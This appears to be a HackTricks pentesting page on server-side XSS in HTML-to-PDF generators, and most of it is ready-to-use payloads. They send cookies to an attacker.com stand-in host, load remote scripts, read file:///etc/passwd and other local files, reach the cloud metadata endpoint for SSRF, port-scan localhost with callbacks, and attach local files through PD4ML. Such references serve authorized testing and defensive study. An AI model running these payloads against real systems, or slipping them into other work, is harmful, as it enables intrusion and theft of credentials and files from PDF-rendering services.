Skip to content

Server Side XSS (Dynamic PDF) โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Server Side XSS (Dynamic PDF) โ€‹

If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code.
So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.

Please, notice that the <script></script> tags don't work always, so you will need a different method to execute JS (for example, abusing <img ).
Also, note that in a regular exploitation you will be able to see/download the created pdf, so you will be able to see everything you write via JS (using document.write() for example). But, if you cannot see the created PDF, you will probably need extract the information making web request to you (Blind).

  • wkhtmltopdf is known for its ability to convert HTML and CSS into PDF documents, utilizing the WebKit rendering engine. This tool is available as an open-source command line utility, making it accessible for a wide range of applications.
  • TCPDF offers a robust solution within the PHP ecosystem for PDF generation. It is capable of handling images, graphics, and encryption, showcasing its versatility for creating complex documents.
  • For those working in a Node.js environment, PDFKit presents a viable option. It enables the generation of PDF documents directly from HTML and CSS, providing a bridge between web content and printable formats.
  • Java developers might prefer iText, a library that not only facilitates PDF creation but also supports advanced features like digital signatures and form filling. Its comprehensive feature set makes it suitable for generating secure and interactive documents.
  • FPDF is another PHP library, distinguished by its simplicity and ease of use. It's designed for developers looking for a straightforward approach to PDF generation, without the need for extensive features.

Payloads โ€‹

Discovery โ€‹

markup
<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">

SVG โ€‹

Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.

markup
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
      alert(1);
   // ]]>
  </script>
</svg>

You can find a lot other SVG payloads in https://github.com/allanlw/svg-cheatsheet

Path disclosure โ€‹

markup
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>

Load an external script โ€‹

The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.

markup
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

Read local file / SSRF โ€‹

โš ๏ธ

Change file:///etc/passwd for http://169.254.169.254/latest/user-data for example to try to access an external web page (SSRF).

If SSRF is allowed, but you cannot reach an interesting domain or IP, check this page for potential bypasses.

markup
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
markup
<script>
    xhzeem = new XMLHttpRequest();
    xhzeem.onload = function(){document.write(this.responseText);}
    xhzeem.onerror = function(){document.write('failed!')}
    xhzeem.open("GET","file:///etc/passwd");
    xhzeem.send();
</script>
markup
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd"> 
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
markup
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

Bot delay โ€‹

markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = `https://attacker.com/ping?time=${time}ms`;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">

Port Scan โ€‹

markup
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
        let img = document.createElement("img");
        img.src = `http://attacker.com/ping?port=${port}`;
    });
}

for(let i=0; i<1000; i++) {
    checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">

SSRF โ€‹

This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).

Attachments: PD4ML โ€‹

There are some HTML 2 PDF engines that allow to specify attachments for the PDF, like PD4ML. You can abuse this feature to attach any local file to the PDF.
To open the attachment I opened the file with Firefox and double clicked the Paperclip symbol to store the attachment as a new file.
Capturing the PDF response with burp should also show the attachment in cleat text inside the PDF.

html
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>

References โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: